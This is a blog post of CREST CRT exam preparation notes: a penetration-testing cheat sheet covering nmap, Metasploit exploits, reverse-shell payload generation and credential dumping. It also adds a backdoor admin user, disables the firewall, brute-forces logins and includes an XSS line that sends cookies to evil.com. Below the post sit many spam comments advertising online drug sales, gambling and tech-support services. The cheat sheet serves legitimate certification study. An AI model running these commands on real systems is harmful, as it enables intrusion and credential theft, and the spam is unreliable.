I'm going to be taking the CREST CRT exam in January and wanted to share my preparation notes with the world to save everyone else the time and effort of digging up this information to pass the exam.
Note: I have not taken the exam yet, I do not know the answers and am in no way affiliated with CREST.
Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints I will however leave this post up to assist future participants :)
What have we gota do?
First things first, the official CREST site and CRT page is here:
http://www.crest-approved.org/information-security-testers/registered-tester/index.html
To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."
For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.
Getting hands-on!
Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints I will however leave this post up to assist future participants :)
What have we gota do?
First things first, the official CREST site and CRT page is here:
http://www.crest-approved.org/information-security-testers/registered-tester/index.html
To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."
For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.
Getting hands-on!
My goal during the practical exam is to be as quick and efficient as possible. I want to minimize time spent analyzing results, configuring tools or writing custom stuff and maximize time spent answering questions! I plan to use a Windows box with Kali Linux VM. Below is my full list of tools and one-liners:
RECON AND ENUMERATION
RECON AND ENUMERATION
| Command | Description |
|---|---|
| nmap -T4 -A -Pn -oA scan -v 192.168.1.1-254 | Full scan |
| for i in 21 22 23 80 443 445;do cat scan.gnmap|grep " $i/open"|cut -d " " -f2 > $i.txt;done | Parse results into txt files per port |
| nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=pwndizzle,smbpass=mypassword -p445 192.168.1.1-254 | Check for open shares |
| dig axfr example.com @ns1.example.com | DNS zone transfer (Linux) |
| tcp.port, tcp.srcport, ip.src, ip.dst, or, and | Wireshark syntax |
| tcpdump tcp port 80 -w output.pcap -i eth0 | Tcpdump syntax |
| mount 192.168.1.1:/share /mnt/nfs | Mount an NFS share |
| mount -o nolock -t nfs -o proto=tcp,port=2049 172.16.1.1:/ /mnt | Mount an NFS share |
| mount -t cifs -o username=<user>,password=<password>,domain=example.com //WIN_PC_IP/<share name> /mnt/windows | Mount a Windows share |
| net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:no | Mount a Windows share |
| net use \\<target>\IPC$ "" /u:"" | Null session |
| rpcclient -U "" <target> | Null session |
| enum4linux.pl 192.168.1.20 | Retrieve domain info |
| onesixtyone -c names -i snmphosts | SNMP enum |
| snmpcheck -t 172.10.1.1 -c public | SNMP enum |
| nslookup -> set type=any -> ls -d <domain> | DNS zone transfer (Windows) |
| nmap --script=smb-check-vulns --script-args=unsafe=1 -p445 <host> | SMB vuln scan |
METASPLOIT
| Command | Description |
|---|---|
| use auxiliary/scanner/http/dir_scanner | Scan for directories |
| use auxiliary/scanner/http/jboss_vulnscan | JBoss scan |
| use exploit/multi/http/jboss_maindeployer | JBoss deploy |
| use auxiliary/scanner/mssql/mssql_login | MSSQL cred scan |
| use exploit/windows/mssql/mssql_payload | MSSQL payload |
| use auxiliary/scanner/mysql/mysql_version | MySQL version scan |
| use auxiliary/scanner/mysql/mysql_login | MySQL login |
| use auxiliary/scanner/oracle/oracle_login | Oracle login |
| use exploit/windows/dcerpc/ms03_026_dcom | eazymode |
| use exploit/windows/smb/ms06_040_netapi | eazymode |
| use exploit/windows/smb/ms08_067_netapi | eazymode |
| use exploit/windows/smb/ms09_050_smb2_negotiate_func_index | eazymode |
| run post/windows/gather/win_privs | Show privs of current user |
| use exploit/windows/local/bypassuac (check if x86/64 and set target) | Bypass uac on win7+ |
| load mimikatz -> wdigest | Dump creds |
| load incongnito -> list_tokens -> impersonate_token | Use tokens |
| use post/windows/gather/credentials/gpp | GPP |
| run post/windows/gather/local_admin_search_enum | Test other machines |
| msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe | Standalone meterpreter |
| use exploit/multi/script/web_delivery | Powershell payload delivery |
| post/windows/manage/powershell/exec_powershell | Upload and run a PS script through a session |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.1.3.19 LPORT=4444 -a x86 -f exe -e x86/shikata_ga_nai -b '\x00' -i 3 > meter.exe | Generate standalone payload |
WINDOWS COMMANDS
https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit
ipconfig /all
|
Displays the full information about your NIC’s.
|
ipconfig /displaydns
|
Displays your local DNS cache.
|
netstat -nabo
|
Lists ports / connections with corresponding process (-b), don’t perform looking (-n), all connections (-a) and owning process ID (-o)
|
netstat -r
|
Displays the routing table
|
netstat -anob | findstr “services, process or port”
|
The “b” flag makes the command take longer but will output the process name using each of the connections.
|
netsh diag show all
|
{XP only} Shows information on network services and adapters
|
net view
|
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup or domain.
|
net view /domain
|
List all domains available to the host
|
net view /domain:otherdomain
|
Queries NBNS/SMB (SAMBA) and tries to find all hosts in the ‘otherdomain’
|
net user %USERNAME% /domain
|
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
|
net user /domain
|
Lists all of the domain users
|
net accounts
|
Prints the password policy for the local system. This can be different and superseded by the domain policy.
|
net accounts /domain
|
Prints the password policy for the domain
|
net localgroup administrators
|
Prints the members of the Administrators local group
|
net localgroup administrators /domain
|
as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
|
net group “Domain Admins” /domain
|
Prints the members of the Domain Admins group
|
net group “Enterprise Admins” /domain
|
Prints the members of the Enterprise Admins group
|
net group “Domain Controllers” /domain
|
Prints the list of Domain Controllers for the current domain
|
net share
|
Displays your currently shared SMB entries, and what path(s) they point to
|
net session | find / “\\”
| |
arp -a
|
Lists all the systems currently in the machine’s ARP table.
|
route print
|
Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
|
whoami
|
View the current user
|
tasklist /v
|
List processes
|
taskkill /F /IM "cmd.exe"
|
Kill a process by its name
|
net user hacker hacker /add
|
Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
|
net localgroup administrators hacker /add
|
Adds the new user ‘hacker’ to the local administrators group
|
net share nothing$=C:\ /grant:hacker,FULL /unlimited
|
Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.
One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind
|
net user username /active:yes /domain
|
Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
|
netsh firewall set opmode disable
|
Disables the local windows firewall
|
wmic useraccount get name,sid - Retrieve name and sid from command line.
LINUX COMMANDS
| Command | Description |
|---|---|
| apt-get install finger rsh-client jxplorer sipcalc | Finger not installed in Kali by default |
| apt-get install rsh-client | R-tools not installed in Kali by default |
| uname -a | Kernel version |
| cat /etc/<distro>-release | Release version |
| showrev -p | Revision |
| rlogin -l <user> <target> | rlogin |
| rsh <target> <command> | rsh |
| find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt & | Find setuid binaries |
| finger <username>@<ip> | Retrieve user info |
| mysql -h <ip> -u <user> -p <password> | Connect to mysql |
| oscanner -s <ip> -r <repfile> | Oracle scanner |
PASSWORD GUESSING
| Command | Description |
|---|---|
| hydra -L users -P passwords -M 21.txt ftp | Brute ftp |
| hydra -L users -P passwords -M 22.txt ssh | Brute ssh |
| hydra -L users -P passwords -M 445.txt smb | Brute smb |
| User List |
|---|
| root |
| admin |
| administrator |
| manager |
| crest |
| crt |
| user |
PASSWORD CRACKING
| Command | Description |
|---|---|
| john --wordlist=/usr/share/wordlists/rockyou.txt hashes | JTR default |
WEB APP
| Command | Description |
|---|---|
| document.write('<img src="http://evil.com/x.gif?cookie=' + document.cookie + '" />) | XSS steal cookie |
| sqlmap -u <target> -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/test.php" | Targeted scan |
| sqlmap -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3 | Automated scan |
How did the exam go?
ReplyDeleteGreat Article Cyber Security Projects projects for cse Networking Security Projects JavaScript Training in Chennai JavaScript Training in Chennai The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training
DeleteI passed :)
ReplyDeleteCongratulations! I take it next week you see. Any pointers?
ReplyDeleteIt's still early days for me, however I have done lots of training over the years (10+), SCP, Security+, Backtrack 101, CISSP, CEH, ECSA. Now, I know many of the courses I have done are only touching the tip of the iceberg in relation to Pen-Testing but as I am out of work I was wondering if it would be reasonable to skip the training and just take the exam?
ReplyDeleteLike any exam it's wise to revise and prepare accordingly. The amount of prep depends on your experience. For the CRT if you have a few years security/pentesting experience you should be fine. Without practical experience though you may find it hard.
ReplyDeleteDoes this exam follow CTF fashion ? Where you have to own different boxes? Apart from that, which is the level of detail requested in the exam? Do you have to know every single thing from IPSec for instance?
ReplyDeleteHi there,
ReplyDeleteHave you taken the CPSA exam. Can you share some tips if there is any technical aspect of the test?
This post really great !
ReplyDeletecan i connect with you to ask for more info? u email pls?
ReplyDeleteGreat post and informative blog.it was awesome to read, thanks for sharing this great content to my vision.
ReplyDeleteGood discussion.
PMP Training Course in Bangalore
PMP Training Course in Dammam
PMP Training Course in Dubai
PMP Training Course in Jeddah
PMP Training Course in Riyadh
Hi, great post! One more question?
ReplyDeleteDo I need to get root to the exam boxes to find all the answers or is just enough to make scans and enumerate the machine to find its?
Please advise.
I looking to book the exam ASAP.
Thanks
I know that after reading this useful info you will learn a lot about avoiding plagiarism. I had such experience recently
ReplyDeletenice..................
ReplyDeletevietnam web hosting
google cloud server hosting
canada telus cloud hosting
algeeria hosting
angola hostig
shared hosting
bangladesh hosting
botswana hosting
central african republi hosting
shared hosting
hp envy photo 7855 driver
ReplyDeleteYour post is very helpful and information is reliable. I am satisfied with your post. Thank you so much for sharing this wonderful post. Visit:- advisor for you office.com/setup | office.com/setup | | Norton.com/setup | office.com/setup | log in Telstra Webmail Account
ReplyDeleteشركة تنظيف منازل بجازان
ReplyDeleteشركة تنظيف منازل
شركة تنظيف بأبوعريش جازان
شركة تنظيف بأبوعريش
شركة تنظيف كنب بجازان
شركة تنظيف كنب
شركة عزل مسابح بجازان
شركة عزل مسابح
شركة عزل خزانات بجازان
شركة عزل خزانات
شركة عزل مسابح بجازان
شركة عزل مسابح
شركة عزل اسطح بجازان
شركة عزل اسطح
شركة مكافحة حشرات بجازان
شركة مكافحة حشرات
شركة تنظيف المجالس في جازان
شركة تنظيف المجالس
شركة تنظيف موكيت بجازان
شركة تنظيف موكيت
شركة تنظيف فلل بجازان
شركة تنظيف فلل
شركة تنظيف سجاد بجازان
شركة تنظيف سجاد
An overview of ProtonMail sign up and login process In the world of Gmail and Yahoo, there is one email service provider that is overpowering these prominent emailing platform i.e. ProtonMail. This emailing platform runs on Swiss Privacy Standard to secure users data from getting into wrong hands. So, those users who are curious to know what is ProtonMail and ProtonMail login process can continue reading this informative further.
ReplyDeletevisit@-
mcafee.com/activate |
office.com/setup |
طراحی سایت بیمه
ReplyDeleteسئو سایت
school administration software
ReplyDeletesmart school management system
school database management system
education erp software
school erp system
smart school software
Nice Blog. Thanks for sharing with us. Such amazing information.
ReplyDeleteRole of Increasing Brand Awareness in Business
MyBlogger Club
Guest Posting Site
Best Guest Blogging Site
Guest Blogger
Guest Blogging Site
Chase Verify Card – Chase bank Credit Card clients can confirm and activate online at chase.com. In the event that you have just applied for a Credit Card of Chase Bank, you ought to activate it by confirming it online at Bank's authentic site is www.chase.com. On the off chance that you "How would I enact my interest Credit Card?" Are searching for. So read the cycle beneath to confirm the card, at that point activate it.
ReplyDeleteRead More…
reset canon printer
ReplyDeletehow to reset canon printer
how do i reset my canon printer
canon printer reset
how to reset canon printer to factory settings
canon printer reset tool
canon printer error
ReplyDeleteI found this is an informative blog and also very useful and knowledgeable. I would like to thank you for the efforts you have made in writing this blog Buy Ambien Online
Order Ambien Online
Buy Ambien 10mg Online
about
ReplyDeleteabout
The way toward enacting Amazon Prime Video on Roku is exceptionally simple yet for this, you need to initially make a record on Amazon Prime to get the enlistment code and afterward on www.amazon.com/mytv go and afterward enter the Activation code.
ReplyDeleteRead more…
Welcome to you all, you are probably searching for your other half if you have found this review. find a russian bride You're very fortunate if you came here for your love just as I did once. I was also alone for a long time now, and francly I didn't think I would ever search for a soul mate, but I changed my mind dramatically when I saw this awesome dating site because you really do find love on this site! Can you believe that you don't have to wander through the parks to find girls? Now all this can be done on this website online. And you have to log what you have to do is.
ReplyDeleteI concluded one day that it was time for me to sit down and locate a second half. But it was hard for me, because it is not simple for me to communicate with people in real life. Lately, the Internet was not simpler, and more sociable was the Internet, and I did not. I always desired a wife for myself at the same time, however. How good a latin wives can now be. You discuss a bit before that and grasp whether you are suited for yourself
ReplyDeleteAccurate info soft Provide The https://acsonnet.com/it-outsourcing/robotic-process-automation-rpa/. And this is a tool that makes it easy to develop, manage and deploy software robots that emulate people actions communicating with digital systems and also with software tools.
ReplyDeleteAccurate Infosoft Provide Application maintenance services in USA, This software is changing business environment and technology enhancement it is very necessary for organization to maintain and update existing applications. Our Application maintenance services will help organizations to provide high service levels and reduce expenses.
ReplyDeleteAccurate infosoft Provide Best Erp solution in USA. It is based on ISO guidelines therefore it automates business process in a more systematic way and help enterprise to achieve various level of standards in quality.
ReplyDeleteBut what type of sales professional would suit? No one ever achieved true wealth working for another. Control of one's sales destiny lies with management decisions than can keep an entrepreneurial mind in short trousers. salesforce certification course
ReplyDeleteSeveral factors matter when you choose the Microsoft 365 subscription. Depending on your requirements on the respective productivity platforms, these products are different in price. MS 365 is a cloud-based subscription productivity suite best suitable for individuals, businesses, and homes as users don’t have to worry about updates or any custom-related features
ReplyDeletemicrosoft365.com/setup
Microsoft365.com/setup
Hi....
ReplyDeleteThe CREST Registered Tester (CRT) exam is an open book exam divided into two parts: A practical examination testing skills and knowledge needed to carry out effective security assessments. Multiple choice answers examining your technical knowledge.
You are also read more 100 Home Loan
Investing Secne Is An Online Portal To Find, Compare And Review The Best Brokers And Trading Strategies Around The Globe. Along With Broker Reviews & Login Details At Investing Secne, You Can Also Find News, Latest Articles, Prs, Industry Updates And Tools That May Be Useful In Making Investment Decisions.
ReplyDeleteWe are a service provider with expertise in providing complete information on Harris Teeter Ess . Our team has the resources you need to trade intelligently and improve your knowledge base. Check out our special reports page to get key information on this stock as well as other stocks that may be of interest to you.
ReplyDeleteExcellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites
ReplyDeleteartificial intelligence internship | best final year projects for cse | internship certificate online | internship for mba finance students | internship meaning in tamil
Welldone keep it up and thanks for sharing. What should be the immediate step to Change Yahoo Password is the most important aspect. If you are a Yahoo email user and want to have the solution factors, then do not worry anymore, you can simply talk to the Yahoo support team to ask the relevant strategies and resolve the issues. Different kinds of systems are there that have to be followed while changing the passwords effectively.
ReplyDeleteYour post got my attention and shows me different perception for how we should boost our site. This is a really perfect for a new blogger like me who doesn’t want their site to be messy with those spammers who don’t even read your post but they have the guts to comment in your site. Thanks again.
ReplyDeletemajortotositecom
racesitepro
oncasinositenet
totopickpro
Awesome..You have clearly explained …Its very useful for me to know about new things..Keep on blogging..
ReplyDeleteibm full form in india |
ssb ka full form |
what is the full form of dp |
full form of brics |
gnm nursing full form |
full form of bce |
full form of php |
bhim full form |
nota full form in india |
apec full form
Impressive!Thanks for the post
ReplyDeleteBest Travel Agency in Madurai | Travels in Madurai
Madurai Travels | Best Travels in Madurai
Tours and Travels in Madurai | Best Tour Operators in Madurai
Having read this I believed it was really enlightening. I appreciate you spending some time and energy to put this content together. 토토
ReplyDeleteHello! I just want to give you a big thumbs up for your excellent info you have got here on this post. 온라인경마
ReplyDeleteI like reading a post that can make people think. Also, thank you for allowing for me to comment! 파친코사이트
ReplyDeleteThis is frequently an awesome post. this educational article give genuinely best quality information. 토토
ReplyDeleteI like the valuable information you provided in your article. I am sure I will learn many new things here! Good luck.
ReplyDeleteAlso Visit us
Dry cleaners in Birmingham
Laundry and dry cleaning services in Solihull
I appreciate your website. Its really very help full. Thanks for sharing the great information.
ReplyDeleteVisit us for more..
Spa and salon laundry services in Birmingham
Commercial laundry services in Birmingham
Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.
ReplyDeleteeniac full form in computer
dvd full form
sit full form
pcc full form
iucn full form
full form of lcd
brics full form
tally erp full form
full form of ctbt
crpf full form
Great article. Keep writing such kind of information on your blog.
ReplyDeleteBest call center software | Call center software
Visiting blogs like yours is important for every person. New information allows development. I have a question. can someone write my marketing plan, I think yes. I know I can order everything I need. Many writers are ready to write anything for me. It is very convenient for everyone.
ReplyDeleteBlogging is hard. You should always write interesting texts. If you need help I can help https://alanthomsonsim.com/Forums/users/lisakelt/. It is not difficult for me. I am a writer.
ReplyDeleteAs half and half application improvement with the versatile business has a consistent ascent, portable application advancement has become progressively cutthroat. The inescapability of cell phones and the boundless utilization of portable applications among the worldwide populace has made cell phones an ideal road through which organizations can connect with their clients and clients. Organizations can offer their items and administrations by means of versatile applications and essentially increment their client base. Accordingly, the job of portable application improvement in driving the development of organizations has never been more significant>> ionic developer
ReplyDeleteManage your surgery pain with Aspadol (Tapentadol) 100mg when you are stuck at home. Click to know more. On the other hand, the immediate-release Aspadol is used on an as-needed basis.
ReplyDeleteHow to Manage Your Surgery Pain with Aspadol 100mg
Buy Tapentadol 100mg online
Do you have a line of business that is growing? And your development team can't keep up with it, or are you using a framework that's hard to scale? For this, there is an angular free ide, which knows how to follow and immediately implement the most relevant things in your business. Our team will select for you the most suitable engineer who will bring a lot of benefits to your business.
ReplyDeleteIf your project requires the help of professionals, then you definitely need to apply for the services of hiring dedicated Azure automation engineer in a couple of clicks here! Here you will be matched with a professional to according to your unique business requirements. I hope this was helpful to you!
ReplyDeleteEvery student feels very depressed about their Exam Preparation. This post is everything mentioned about students' Exam Preparation. But now sentence correction website tool helps to those students whose want good marks in English subject. I also try this tool when my exam is near. This tool helps me a lot for improving my knowledge.
ReplyDeleteHello! Is your AI specialized in working with medical information? Then our medical image annotation services will be very useful for you! Our specialists in the description of information for training will build the process according to the required standards, which will achieve a high result.
ReplyDeleteHello! Our company provides the best experts in data labeling and annotation and serves many different business sectors. We have experience in healthcare, insurance, finance, grocers and more. If you also need Human Annotation, then contact us and after a short consultation we will select the best professional for you!
ReplyDelete